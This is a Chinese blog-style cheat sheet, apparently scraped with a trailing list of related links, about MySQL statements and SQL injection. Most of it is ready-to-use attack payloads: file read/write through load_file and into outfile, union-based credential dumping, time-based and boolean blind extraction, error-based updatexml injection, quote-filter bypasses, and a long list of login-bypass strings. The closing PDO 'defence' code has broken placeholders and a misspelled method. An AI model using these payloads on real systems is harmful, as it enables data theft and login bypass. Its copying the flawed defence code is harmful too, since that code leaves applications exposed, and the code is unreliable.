常用的mysql语句

创建mysql用户

#‘host’的值为指定哪些ip可以登录,值为‘%’表示任何人可以登录,值为'localhost'仅允许本机登录
CREATE USER 'username'@'host' IDENTIFIED BY 'password';

此处创建用户名为test, 密码为123456

读取文件内容

#读取指定路径的文件内容
select load_file('c:/phpstudy/www/key.txt')

写入文件内容

#向指定路径的文件写入内容
select '123' into outfile 'c:/flag.txt'

注意:如果不能写入文件,先查看mysql的配置文件,若secure_file_priv的值为NULL, 请修改mysql.ini文件

修改mysql.ini 文件,在[mysqld] 下加入secure_file_priv =,随后重启mysql服务

show global variables like '%secure%';

修改mysql.ini 文件,在[mysqld] 下加入secure_file_priv =,保存,重启mysql。

时间盲注常用语句

sleep(秒数)

#sleep通常配合if语句实现时间盲注
select * from sqlfaker.news where id=1 and sleep(1)

if(条件,true,false)

#条件若为真,返回且执行ture,否则返回且执行false
select if(1=1,1,2)

length(字符串)

#获取字符串的长度
select length(database())

mid(str,首位,个数)

limit(start, length), 参数start是从0开始的

limit(0,1) #0表示第一行,获取表第一行的内容
limit(1,1) #1表示第二行,获取表第二行的内容
limit(0,2) #获取表前面两行的内容

报错注入常用语句

extractvalue(1,sql注入语句)

updatexml(1,sql注入语句,0)

extractvalue(1,select database())
updatexml(1,select database(),0)

mysql自带的总表

Information_schema:mysql5.0以上版本自带数据库,记录当前数据库所有数据库名、表名、列名

表名 作用
Information_schema.schemata 存放所有数据库名的表
information_schema.tables 存放所有表名的表
Information_schema.columns 存放所有列名的表
列名 作用
table_name 表的列名
column_name 列的列名
table_schema 数据库的列名,存在于information_schema.tablesInformation_schema.columns
schema_name 数据库的列名,只存在information_schema.schemata这张表中

Sql注入类型

联合查询注入

1.判断是否存在注入

select * from news where id=1 or 1=1     #逻辑为真,返回正常页面
select * from news where id=1 and 1=2    #逻辑为假,返回其他页面

2.判断列名数量

select * from news where id=1 order by 2     #可通过二分法来判断列名数量

3.判断那些列名能显值

因为要确定将sql注入语句写入到能显值得列名中

select * from news where id=1 union select 1,2   #看看哪个列名能显示值

4.获取所有数据库名

#从information_schema.schemata表中获取所有的数据库名字
select * from news where id=1 union select schema_name,2 from information_schema.schemata

5.获取指定数据库的所有表名

#从information_schema.tables表中获取名为"sql"的数据库下的所有表名
select * from news where id=1 union select table_name,2 from information_schema.tables where table_schema="sql"

6.获取指定表的所有列名

#从information_schema.columns获取名为"news"的表下的所有列名
select * from news where id=1 union select column_name,2 from information_schema.columns where table_name="news"

7.获取指定数据库、表、列下的值

#从sql数据库的news表中获取列名为username和password的值
select * from news where id=1 union select username,password from sql.news

基于时间的盲注

1.猜当前数据库名字的长度:

id=1 and sleep(if(length(database())=1,0,5))

2.猜当前数据库的名字:

#ord()转换成ASCII码
id=1 and sleep(if(ord(mid(database(),1,1))=115,0,5))id=1 and sleep(if(ord(mid(database(),2,1))=115,0,5))

3.猜指定数据库的表的长度:

#从information_schema.tables表中猜名为"database"的数据库的表的长度
id=1 and sleep(if(length((select table_name from information_schema.tables where table_schema="database" limit 0,1))=5,0,5))id=1 and sleep(if(length((select table_name from information_schema.tables where table_schema="database" limit 1,1))=5,0,5))

4.猜指定数据库的表的名字:

#从information_schema.tables表中猜名为"database"的数据库的表的名字
id=1 and sleep(if(ord(mid((select table_name from information_schema.tables where table_schema="database" limit 0,1),1,1))=115,0,5))id=1 and sleep(if(ord(mid((select table_name from information_schema.tables where table_schema="database" limit 1,1),1,1))=115,0,5))

5.猜指定表的字段的长度:

#从information_schema.columns表中猜名为"users"的表的字段的长度
id=1 and sleep(if(length((select column_name from information_schema.columns where table_name="users" limit 0,1))=1,0,5))id=1 and sleep(if(length((select column_name from information_schema.columns where table_name="users" limit 1,1))=1,0,5))

6.猜指定表的字段的名字:

#从information_schema.columns表中猜名为"users"的表的字段的名字
id=1 and sleep(if(ord(mid((select column_name from information_schema.columns where table_name="users" limit 0,1),1,1))=115,0,5))id=1 and sleep(if(ord(mid((select column_name from information_schema.columns where table_name="users" limit 1,1),1,1))=115,0,5))

7.猜指定数据库,表名、列名的值:

#从database.users表中猜用户和密码的长度
id=1 and sleep(if(length((select user,pass from database.users))=1,0,5))  #从database.users表中猜用户和密码的内容
id=1 and sleep(if(ord(mid((select user,pass from database.users),1,1))=115,0,5))

基于布尔的盲注

和上面的时间盲注流程差不多

id=1 and length(database())=1id=1 and ord(mid(database(),1,1))=115

四种报错注入

insert注入:针对用户注册

INSERT INTO news(id,name) VALUES (3,'ko' or updatexml (1,concat(0x7e,(version()),0),0))

update注入:针对用户修改

update users SET password='faker’or updatexml(2,concat(0x7e,(version())),0)or''where username='fucker'

delete注入:针对信息删除

delete from sqlfaker where username= '2' or updatexml(2,concat(0x7e,(version())),0)#'

limit注入:

Select * from sqlfaker.news where id>0 order by id limit0,1 procedure analyse(updatexml (1,concat(0x7e,(version()),0),0))

sql注入常用绕过

1.HEX编码绕过单双引号过滤

通过对表名、列名和数据库名进行HEX编码, 可有效绕过单双引号过滤机制

2.参数加密注入

有些url里的参数是加密的,网站服务器在收到url加密过的参数时会对其进行解密,面对这种情况要先知道url参数采用的是什么加密方式, 然后对sql注入语句进行相应的加密

如下图所示,此网站都url参数采用base64编码, 那么我们的sql注入语句也要使用base64编码

3.宽字节绕过单双引号过滤

涉及注入的php函数addslashes() ,其作用是在每个单双引号前添加反斜杠,如下图所示

将闭合符号由单(双)引号修改成%df'

简单来说就是%df'就是把\吃掉然后变成了�\' , 由此来实现符号闭合

1%df' union select 1,user(),3 #

万能密码注入

介绍

一些后端代码会通过查询返回的行数来判断是否登录成功,若查询返回的是一行或多行, 后端代码会识别成登录成功

此处演示的sql查询语句: select * from users where user='$user' and pass='$password'

user字段注入

构造user字段的值: admin'#

完整sql查询语句: select * from users where user='admin'#' and pass='$password'

实际sql查询语句: select * from users where user='admin'

pass字段注入

构造pass字段的值: 'or 1=1 or'

完整sql查询语句: select * from users where user='$user' and pass=''or 1=1 or''

实际sql查询语句: select * from users where true

mysql逻辑判断是从前往后排,假and假or真or假的整体逻辑为真

常用万能密码

' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1

PDO技术防御sql注入

调用quote函数

<?php
@$id = addcslashes($_GET['X']);  //对GET参数采取单双引号过滤机制
error_reporting(E_ALL ^ E_DEPRECATED);
$pdo = new PDO('mysql:host=localhost;dbname=test','root','root');  //创对象建PDO
$id = $pdo->quote($id);   //调用quote函数
$sql = "select * from users where id=$id";
if ($row = $pdo->query($sql)) {foreach($row as $key => $value){print_r($value); }
}
echo $sql;
?>

预处理sql语句:

1、通过命名参数防止注入

<?php
@$id = addcslashes($_GET['X']);
error_reporting(E_ALL ^ E_DEPRECATED);
$pdo = new PDO('mysql:host=localhost;dbname=test','root','root');
$sql = "select * from users where id:$id";  //定义sql语句
$stmt = $pdo->prepare($sql);    //预处理sql语句
$stmt->execute(array(":id"=>$id));   //execute参数为数组,执行预处理过的sql语句
echo $stmt->rowCount();   //返回执行sql语句后的结果命令行,大于0为成功,等于0为失败
?>

2、通过问号占位符防止注入

<?php
@$id = addcslashes($_GET['X']);
error_reporting(E_ALL ^ E_DEPRECATED);
$pdo = new PDO('mysql:host=localhost;dbname=test','root','root');
$sql = "select * from users where id=?";
$stmt = $pdo->prepare($sql);    //预处理sql语句
$stmt->execute(array($id));   //execute参数为数组,执行预处理过的sql语句
echo $stmt->rowCount();   //返回执行sql语句后的结果命令行,大于0为成功,等于0为失败
?>

3、通过bindParam()绑定参数

<?php
@$id = addcslashes($_GET['X']);
error_reporting(E_ALL ^ E_DEPRECATED);
$pdo = new PDO('mysql:host=localhost;dbname=test','root','root');
$sql = "select * from users where id:$id";
$stmt = $pdo->prepare($sql);  //预处理sql语句
$stmt->bindParm(":id",$id,PDO::PARAM_STR);
$stmt->execute();
echo $stmt->rowCount();
?>

MySql注入的基本了解相关推荐

  1. concat mysql sql注入_sql注入-mysql注入基础及常用注入语句

    最近在教学中,关于SQL注入,总发现学生理解起来有些难度,其实主要的原因是对各类数据库以及SQL语句不熟悉,今天先介绍mysql注入需要掌握的基础, Mysql内置information_schema ...

  2. MySQL注入中报错的利用

    MySQL注入中报错的利用 在很多的情况 下我们不能直接方便的进行注入,于是有了BENCHMARK延迟注射,如果能得到MySQL的错误信息的话,现在又有了更方便的方法. 网上流传了两三种方法,以前我在 ...

  3. mysql内置变量_详解MySQL注入利用的变量

    MySQL注入数据库时,我们可以利用内置的变量来得到更多的mysql信息,下面就让我们一起来了解MySQL注入利用的变量. 当我们注射mysql库的输入点的时候,可以通过version()/user( ...

  4. mysql注入语句解释,MYSQL注入语句实用精解

    MYSQL注入语句实用精解 只讲字符型. order by XX Union select ..... 1' UNION SELECT 1,CONCAT(user(),0x3a,database(), ...

  5. mysql注入提取邮件_【sql注入教程】mysql注入直接getshell

    Mysql注入直接getshell的条件相对来说比较苛刻点把 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正 ...

  6. jsp mysql 注入_由Jsp+Mysql注入到root权限的全程展 【好久没有安全类文章了,转一篇看看】...

    由Jsp+Mysql注入到root权限的全程展 最近有点空闲,所以写点垃圾文章来消磨一下时间.文中没有什么技术含量,如果要转载,请注明作者并保持文章的完整. 很多人可能都知道asp,php的编程要防止 ...

  7. php爆数据库,php+MySql注入非暴力爆数据库表段

    某群主发了一篇<php+MySql注入非暴力爆数据库表段>的科普,那样的都可以发,我只好也一起发科普了. Author:Juliet 科普: <php+MySql注入非暴力爆数据库表 ...

  8. php+mysql实例注入,PHP+MYSQL注入实例与防范措施总结

    实例 以下是我在服务器测试并成功注入的例子,大家看一下注入实例中的所有参数,有经验的程序员一看便知,如果不太明白可以自己实践一下,或者看一下注入原理(Php+Mysql注入专题教学),有任何疑问请联系 ...

  9. mysql注入扫描网站漏洞工具_sql注入点扫描工具下载-PHP+MYSQL网站注入扫描工具免费版 - 维维软件园...

    你想进行SQL网站注入扫描吗,那么你肯定需要使用专门的注入扫描工具了,请来下载PHP+MYSQL网站注入扫描工具试试吧,本工具是专门针对PHP网站所编写的一款小工具,软件界面是仿教程的hdsi中的PH ...

  10. mysql注入天书(一)Basic Challenges

    [独家连载]mysql注入天书(一)Basic Challenges lcamry / 2016-11-11 06:16:00 / 浏览数 19798 <span class="con ...

最新文章

  1. thinkphp 微信授权登录 以及微信实现分享
  2. VC获取父进程PID
  3. esp32 怎么分配freertos 堆栈大小_深度解剖~ FreeRtos阅读笔记2 任务创建、内核链表初始化...
  4. HDU 4740 The Donkey of Gui Zhou (模拟)
  5. 动态规划—最长上升子序列(POJ 1458)
  6. Flink eventTime案例无输出
  7. 第 16 章 垃圾回收相关概念
  8. Java常用Linux命令集合
  9. 21天学通java web 第二版pdf_21天学通JAVA WEB开发 pdf完全版_IT教程网
  10. 前端特效-HTML+CSS - 图片悬浮效果
  11. 阿铭Linux_网站维护学习笔记20190416
  12. CUDA By Examples 0 - 准备工作
  13. 计算机无法同步,win7系统电脑无法同步时间的解决方法
  14. python文件起名字的时候不要用模块的名字,不然会默认导入本地的文件,找不到你要的模块方法,会报错AttributeError: module ‘random‘ has no attribute ‘
  15. android ppt 转图片显示不全,ppt转pdf图片显示不全怎么办
  16. 光明乳业孤独症暖心礼包,让“星星的孩子”遇见光明未来
  17. IPv6技术详解:基本概念、应用现状、技术实践(上篇)
  18. 大数据之电信项目架构
  19. Python4班平均成绩统计_郑州十一中2020届高考成绩简析(含新疆内高班)
  20. c++课程设计自助点餐系统

热门文章

  1. 萤石网络回复首轮问询:存在贬低海康威视等行为,称自身创新多
  2. 经典的经典:《几何原本》
  3. html 滚动条_HTML table表格 固定表头 tbody加滚动条
  4. 如何导出Yammer中User信息?
  5. python多线程、多进程处理单个(大,超大)文件
  6. NPN型输入(输出)和PNP型输入(输出)分别是什么意思?
  7. 局域网限速软件_局域网IP限速怎么配置,限速多少比较合适
  8. 各大媒体优劣对比_四大主流自媒体平台优缺点分析
  9. iPhone 6plus 分辨率 为什么是 1242 2208
  10. 装饰工程预结算教程电子书_工程预结算中材料价格调整和土建造价指标的一些事...